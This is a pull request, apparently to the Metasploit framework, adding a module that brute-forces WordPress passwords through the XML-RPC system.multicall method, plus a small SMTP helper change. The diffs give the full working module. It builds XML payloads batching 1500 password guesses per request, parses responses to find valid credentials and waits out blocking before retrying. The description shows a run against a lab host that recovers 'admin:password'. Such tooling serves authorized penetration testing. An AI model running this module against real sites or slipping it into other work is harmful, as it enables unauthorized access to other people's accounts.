### PR TITLE
Add WordPress XMLRPC Massive Bruteforce

### DIFF
--- a/lib/msf/core/exploit/smtp_deliver.rb
+++ b/lib/msf/core/exploit/smtp_deliver.rb
@@ -146,14 +146,18 @@ module Exploit::Remote::SMTPDeliver
     # If the user supplied a Date field, use that, else use the current
     # DateTime in the proper RFC2822 format.
     if datastore['DATE'].present?
-      raw_send_recv("Date: #{datastore['DATE']}\r\n", nsock)
+      #raw_send_recv("Date: #{datastore['DATE']}\r\n", nsock)
+      date = "Date: #{datastore['DATE']}\r\n"
     else
-      raw_send_recv("Date: #{DateTime.now.rfc2822}\r\n", nsock)
+      #raw_send_recv("Date: #{DateTime.now.rfc2822}\r\n", nsock)
+      date = "Date: #{DateTime.now.rfc2822}\r\n"
     end
 
     # If the user supplied a Subject field, use that
+    subject = nil
     if datastore['SUBJECT'].present?
-      raw_send_recv("Subject: #{datastore['SUBJECT']}\r\n", nsock)
+      #raw_send_recv("Subject: #{datastore['SUBJECT']}\r\n", nsock)
+      subject = "Subject: #{datastore['SUBJECT']}\r\n"
     end
 
     # Avoid sending tons of data and killing the connection if the server
@@ -161,6 +165,10 @@ module Exploit::Remote::SMTPDeliver
     if not resp or not resp[0,3] == '354'
       print_error("Server refused our mail")
     else
+      full_msg = ''
+      full_msg << date
+      full_msg << subject unless subject.nil?
+      full_msg << data
       send_status = raw_send_recv("#{data}\r\n.\r\n", nsock)
     end
 

--- a/lib/msf/core/exploit/smtp_deliver.rb
+++ b/lib/msf/core/exploit/smtp_deliver.rb
@@ -166,7 +166,7 @@ module Exploit::Remote::SMTPDeliver
       full_msg << date
       full_msg << subject unless subject.nil?
       full_msg << data
-      send_status = raw_send_recv("#{data}\r\n.\r\n", nsock)
+      send_status = raw_send_recv("#{full_msg}\r\n.\r\n", nsock)
     end
 
     if not already_connected

--- a/lib/msf/core/exploit/smtp_deliver.rb
+++ b/lib/msf/core/exploit/smtp_deliver.rb
@@ -146,17 +146,14 @@ module Exploit::Remote::SMTPDeliver
     # If the user supplied a Date field, use that, else use the current
     # DateTime in the proper RFC2822 format.
     if datastore['DATE'].present?
-      #raw_send_recv("Date: #{datastore['DATE']}\r\n", nsock)
       date = "Date: #{datastore['DATE']}\r\n"
     else
-      #raw_send_recv("Date: #{DateTime.now.rfc2822}\r\n", nsock)
       date = "Date: #{DateTime.now.rfc2822}\r\n"
     end
 
     # If the user supplied a Subject field, use that
     subject = nil
     if datastore['SUBJECT'].present?
-      #raw_send_recv("Subject: #{datastore['SUBJECT']}\r\n", nsock)
       subject = "Subject: #{datastore['SUBJECT']}\r\n"
     end
 

--- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
@@ -56,8 +56,8 @@ class Metasploit3 < Msf::Auxiliary
 
     vprint_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
     xml_payloads = []                          # Container for all generated XMLs
-    xml = ""
-    # Evil XML | Limit number of log-ins to 1700/request for wordpress limitation
+
+    # Evil XML | Limit number of log-ins to 1500/request due wordpress limitation
     passwords.each_slice(1500) do |pass_group|
 
       document = Nokogiri::XML::Builder.new do |xml|
@@ -97,7 +97,6 @@ class Metasploit3 < Msf::Auxiliary
     vprint_status('Generating XMLs just done.')
     xml_payloads
   end
-
 
   #
   # Check target status

--- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
 
     print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
     xml_payloads = []                          # Container for all generated XMLs
-    xml = ""
+    xml = ''
     # Evil XML | Limit number of log-ins to 1500/request for wordpress limitation
     passwords.each_slice(1500) do |pass_group|
 
@@ -113,9 +113,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def parse_response(res)
-
     resp.scan(/Incorrect username or password/)
-
   end
 
   def run
@@ -143,10 +141,6 @@ class Metasploit3 < Msf::Auxiliary
 
         # Request Parser
         req_xml = Nokogiri::Slop xml
-        # Request length
-        # total_req  =  req_xml.document.methodCall.params.param.value.array.data.value.size
-        # print_status("Totla number of combinations: #{total_req}")
-
         # Response Parser
         res_xml = Nokogiri::Slop response.to_s.scan(/<.*>/).join
 
@@ -164,7 +158,7 @@ class Metasploit3 < Msf::Auxiliary
             end end
         rescue NoMethodError
           print_error("It seems you got blocked!")
-          print_warning("I'll sleep for 6 minutes then I'll try  again. CTR+C to exit")
+          print_warning("I'll sleep for 6 minutes then I'll try again. CTR+C to exit")
           sleep 6 * 60
           retry
           # return :abort

--- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
@@ -12,8 +12,8 @@ class Metasploit3 < Msf::Auxiliary
   def initialize(info = {})
     super(update_info(
               info,
-              'Name'            => 'Massive WordPress bruteforce via XMLRPC',
-              'Description'     => %q{Wordpress massive burteforce attack via wordpress XMLRPC service.},
+              'Name'            => 'WordPress XMLRPC Massive Bruteforce ',
+              'Description'     => %q{Wordpress Massive Burteforce attacks via wordpress XMLRPC service.},
               'License'         => MSF_LICENSE,
               'Author'          =>
                   [
@@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary
                   [
                       ['URL', 'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/'],
                       ['URL', 'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html']
-                  ],
-              'DisclosureDate'  => '2015'
+                  ]
           ))
 
     register_options(

--- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
         [
+          OptString.new('TARGETURI', [true, 'The base path', '/']),
           OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line',
                                       File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
           OptPath.new('WPPASS_FILE', [true, 'File containing passwords, one per line',
@@ -118,10 +119,11 @@ class Metasploit3 < Msf::Auxiliary
       generate_xml(user).each do |xml|
         break if passfound == true
 
+        uri = target_uri.path
         opts =
             {
               'method'  => 'POST',
-              'uri'     => wordpress_url_xmlrpc,
+              'uri'     => normalize_uri(uri, wordpress_url_xmlrpc),
               'data'    => xml,
               'ctype'   =>'text/xml'
             }

--- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
-  include Msf::HTTP::Wordpress
+  include Msf::Exploit::Remote::HTTP::Wordpress
 
   def initialize(info = {})
     super(update_info(
@@ -17,8 +17,8 @@ class Metasploit3 < Msf::Auxiliary
               'License'         => MSF_LICENSE,
               'Author'          =>
                   [
-                      'Sabri (@KINGSABRI)',           # MSF module
-                      'William (WCoppola@Lares.com)'  # Requester
+                      'William (WCoppola@Lares.com)',
+                      'Sabri (@KINGSABRI)'
                   ],
               'References'      =>
                   [
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
             OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line',
                                         File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
             OptPath.new('WPPASS_FILE',  [ true, 'File containing passwords, one per line',
-                                        File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")])
+                                          File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")])
         ], self.class)
 
 
@@ -56,8 +56,8 @@ class Metasploit3 < Msf::Auxiliary
 
     print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
     xml_payloads = []                          # Container for all generated XMLs
-    xml = ''
-    # Evil XML | Limit number of log-ins to 1500/request for wordpress limitation
+    xml = ""
+    # Evil XML | Limit number of log-ins to 1700/request for wordpress limitation
     passwords.each_slice(1500) do |pass_group|
 
       xml =  "<?xml version=\"1.0\"?>\n"
@@ -113,7 +113,9 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def parse_response(res)
+
     resp.scan(/Incorrect username or password/)
+
   end
 
   def run
@@ -158,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary
             end end
         rescue NoMethodError
           print_error("It seems you got blocked!")
-          print_warning("I'll sleep for 6 minutes then I'll try again. CTR+C to exit")
+          print_warning("I'll sleep for 6 minutes then I'll try  again. CTR+C to exit")
           sleep 6 * 60
           retry
           # return :abort
@@ -168,4 +170,3 @@ class Metasploit3 < Msf::Auxiliary
       end end end
 
 end
-

--- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
@@ -1,0 +1,177 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+              info,
+              'Name'            => 'Massive WordPress bruteforce via XMLRPC',
+              'Description'     => %q{Wordpress massive burteforce attack via wordpress XMLRPC service.},
+              'License'         => MSF_LICENSE,
+              'Author'          =>
+                  [
+                      'Sabri (@KINGSABRI)',           # MSF module
+                      'William (WCoppola@Lares.com)'  # Requester
+                  ],
+              'References'      =>
+                  [
+                      ['URL', 'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/'],
+                      ['URL', 'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html']
+                  ],
+              'DisclosureDate'  => '2015'
+          ))
+
+    register_options(
+        [
+            OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line',
+                                        File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
+            OptPath.new('WPPASS_FILE',  [ true, 'File containing passwords, one per line',
+                                        File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")])
+        ], self.class)
+
+
+    register_advanced_options(
+        [
+            OptInt.new('THREADS', [true, 'The number of concurrent threads', 5]),
+            OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 5])
+        ], self.class)
+  end
+
+  def usernames
+    File.readlines(datastore['WPUSER_FILE']).map {|user| user.chomp}
+  end
+
+  def passwords
+    File.readlines(datastore['WPPASS_FILE']).map {|pass| pass.chomp}
+  end
+
+  def generate_xml user
+
+    print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
+    xml_payloads = []                          # Container for all generated XMLs
+    xml = ""
+    # Evil XML | Limit number of log-ins to 1500/request for wordpress limitation
+    passwords.each_slice(1500) do |pass_group|
+
+      xml =  "<?xml version=\"1.0\"?>\n"
+      xml << "<methodCall>\n"
+      xml << "<methodName>system.multicall</methodName>\n"
+      xml << "<params>\n"
+      xml << " <param><value><array><data>\n"
+      pass_group.each  do |pass|
+
+        xml << "  <value><struct>\n"
+        xml << "  <member>\n"
+        xml << "    <name>methodName</name>\n"
+        xml << "    <value><string>wp.getUsersBlogs</string></value>\n"
+        xml << "  </member>\n"
+        xml << "  <member>\n"
+        xml << "    <name>params</name><value><array><data>\n"
+        xml << "     <value><array><data>\n"
+        xml << "      <value><string>#{user}</string></value>\n"
+        xml << "      <value><string>#{pass}</string></value>\n"
+        xml << "     </data></array></value>\n"
+        xml << "    </data></array></value>\n"
+        xml << "  </member>\n"
+        xml << "  </struct></value>\n"
+
+      end
+      xml << " </data></array></value></param>\n"
+      xml << "</params>\n"
+      xml << "</methodCall>"
+
+      xml_payloads << xml
+    end
+
+    print_status('Generating XMLs just done.')
+    return xml_payloads
+  end
+
+  #
+  # Check target status
+  #
+  def check_wpstatus
+    print_status("Checking #{peer} status!")
+
+    case
+      when !wordpress_and_online?
+        print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress or you got blocked!")
+        :abort
+      when !wordpress_xmlrpc_enabled?
+        print_error("#{rhost}:#{rport}#{target_uri} does not enable XMLRPC")
+        :abort
+      else
+        print_status("Target #{peer} is running Wordpress")
+    end
+  end
+
+  def parse_response(res)
+
+    resp.scan(/Incorrect username or password/)
+
+  end
+
+  def run
+    check_wpstatus
+
+    usernames.each do |user|
+      passfound = false
+
+      print_status("Bruteforcing user: #{user}")
+      generate_xml(user).each do |xml|
+        break if passfound == true
+
+        opts =
+            {
+                'method'  => 'POST',
+                'uri'     => wordpress_url_xmlrpc,
+                'data'    => xml,
+                'ctype'   =>'text/xml'
+            }
+
+        client = Rex::Proto::Http::Client.new(rhost)
+        client.connect
+        request  = client.request_cgi(opts)
+        response = client.send_recv(request)
+
+        # Request Parser
+        req_xml = Nokogiri::Slop xml
+        # Request length
+        # total_req  =  req_xml.document.methodCall.params.param.value.array.data.value.size
+        # print_status("Totla number of combinations: #{total_req}")
+
+        # Response Parser
+        res_xml = Nokogiri::Slop response.to_s.scan(/<.*>/).join
+
+        begin
+          res_xml.document.methodResponse.params.param.value.array.data.value.each_with_index do |value, i|
+            begin
+              # If this gives exception then its the correct password
+              value.struct.member[1].value.string.text
+            rescue
+              user = req_xml.document.methodCall.params.param.value.array.data.value[i].struct.member[1].value.array.data.value.array.data.value[0].text
+              pass = req_xml.document.methodCall.params.param.value.array.data.value[i].struct.member[1].value.array.data.value.array.data.value[1].text
+
+              print_good("Credentials Found!  #{user}:#{pass}")
+              passfound = true
+            end end
+        rescue NoMethodError
+          print_error("It seems you got blocked!")
+          print_warning("I'll sleep for 6 minutes then I'll try  again. CTR+C to exit")
+          sleep 6 * 60
+          retry
+          # return :abort
+        end
+        print_status('Taking a nap for 2 seconds..')
+        sleep 2
+      end end end
+
+end
+

--- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
@@ -35,13 +35,6 @@ class Metasploit3 < Msf::Auxiliary
                                       File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")]),
           OptInt.new('BLOCKEDWAIT', [true, 'Time(minutes) to wait if got blocked', 6])
         ], self.class)
-
-
-    register_advanced_options(
-        [
-          OptInt.new('THREADS', [true, 'The number of concurrent threads', 5]),
-          OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 5])
-        ], self.class)
   end
 
   def usernames
@@ -161,6 +154,7 @@ class Metasploit3 < Msf::Auxiliary
           sleep datastore['BLOCKEDWAIT'] * 60
           retry
         end
+        vprint_status('Sleeping for 2 seconds..')
         sleep 2
       end end end
 


### PR DESCRIPTION
# WordPress XMLRPC Massive Bruteforce (wordpress API)

This module uses Wordpress API to send 1500 passsword  per request then parses  the response to get the correct password.

to test  it

```
msf auxiliary(wordpress_xmlrpc_massive_bruteforce) > show options 

Module options (auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce):

   Name         Current Setting                                                                Required  Description
   ----         ---------------                                                                --------  -----------
   Proxies                                                                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST        172.17.0.3                                                                     yes       The target address
   RPORT        80                                                                             yes       The target port
   TARGETURI    /                                                                              yes       The base path to the wordpress application
   VHOST                                                                                       no        HTTP server virtual host
   WPPASS_FILE  /home/KING/Code/MSF/metasploit-framework/data/wordlists/http_default_pass.txt  yes       File containing passwords, one per line
   WPUSER_FILE  /home/KING/Code/WEB/wordpress/users.txt                                        yes       File containing usernames, one per line

msf auxiliary(wordpress_xmlrpc_massive_bruteforce) > run

[*] Checking 172.17.0.3:80 status!
[*] Target 172.17.0.3:80 is running Wordpress
[*] Bruteforcing user: admin
[*] Generating XMLs just done.
[+] Credentials Found!  admin:password
[*] Taking a nap for 2 seconds..
[*] Auxiliary module execution completed
msf auxiliary(wordpress_xmlrpc_massive_bruteforce) > 
```
